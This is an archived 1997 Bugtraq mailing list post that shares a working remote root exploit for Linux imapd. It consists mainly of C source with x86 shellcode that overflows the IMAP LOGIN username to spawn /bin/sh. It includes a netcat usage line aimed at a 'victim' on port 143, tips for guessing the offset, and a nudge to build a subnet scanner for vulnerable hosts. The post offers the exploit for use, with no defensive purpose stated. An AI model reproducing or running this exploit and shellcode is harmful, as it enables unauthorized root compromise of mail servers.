Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

imapd goodies, one that works.

From: so1o () INSECURITY ORG (so1o)
Date: Thu, 7 Aug 1997 19:35:34 +0100

Hi,

Here's the rootshell spawning imapd remote exploit, you don't get a
prompt, just hit "ls" or whatever when you connect to port 143 using
this exploit, you need netcat and a bit of luck, ignore any warnings on
compilation...

/*
 * IMAPd Linux/intel remote xploit by savage () apostols org 1997-April-05
 *
 * Workz fine against RedHat and imapd distributed with pine
 *
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of
ToXyn !!!
 *
 * usage:
 *      $ (imap 0; cat) | nc victim 143
 *              |
 *              +--> usually from -1000 to 1000 ( try in steps of 100 )
 *
 *              [ I try 0, 100 and 200 - so1o ]
 */

#include <stdio.h>

char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh";

char username[1024+255];

void main(int argc, char *argv[]) {
        int i,a;
        long val;

        if(argc>1)
                a=atoi(argv[1]);
        else
                a=0;

        strcpy(username,shell);

        for(i=strlen(username);i<sizeof(username);i++)
                username[i]=0x90; /* NOP */

        val = 0xbffff501 + a;

        for(i=1024;i<strlen(username)-4;i+=4)
        {
                username[i+0] = val & 0x000000ff;
                username[i+1] = (val & 0x0000ff00) >> 8;
                username[i+2] = (val & 0x00ff0000) >> 16;
                username[i+3] = (val & 0xff000000) >> 24;
        }

        username[ sizeof(username)-1 ] = 0;

        printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username);
}

If you have half a brain, then it doesn't take 2 mins to throw together
a quick subnet imapd vulnerability scanner, so have fun.

Fin.

.so1o

The CodeZero Ninja Task Force.
   http://www.hacked.net
Previous By Date Next
Previous By Thread Next

Current thread: